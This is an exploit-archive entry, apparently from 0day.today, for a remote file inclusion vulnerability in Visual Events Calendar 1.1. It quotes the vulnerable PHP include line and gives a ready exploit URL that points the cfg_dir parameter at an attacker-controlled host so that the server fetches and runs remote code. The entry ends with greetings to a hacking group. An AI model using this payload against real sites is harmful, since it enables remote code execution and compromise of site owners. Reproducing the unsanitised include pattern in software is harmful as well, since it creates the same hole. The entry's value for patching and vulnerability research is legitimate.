id: 659
date: 08/06/2006
title: Visual Events Calendar 1.1 (cfg_dir) Remote Include Vulnerability
author: xoron
cves: 

=================================================================
Visual Events Calendar 1.1 (cfg_dir) Remote Include Vulnerability
=================================================================



#title: Visual Events Calendar v1.1   (cfg_dir) Remote Inclusion Vulnerability

#Author: xoron

#script: Visual Events Calendar v1.1

#Class : Remote


#CODE:    include $cfg_dir."customize_text.php";

#Exploit: http://www.site.com/[path]/calendar.php?cfg_dir=http://evil_scripts?

#Thanx : WWW.CYBER-WARRiOR.ORG

#Greetz: ShiKaA , DJR , x-mastER ,R3D4c!D ,



#  0day.today [2023-03-21]  #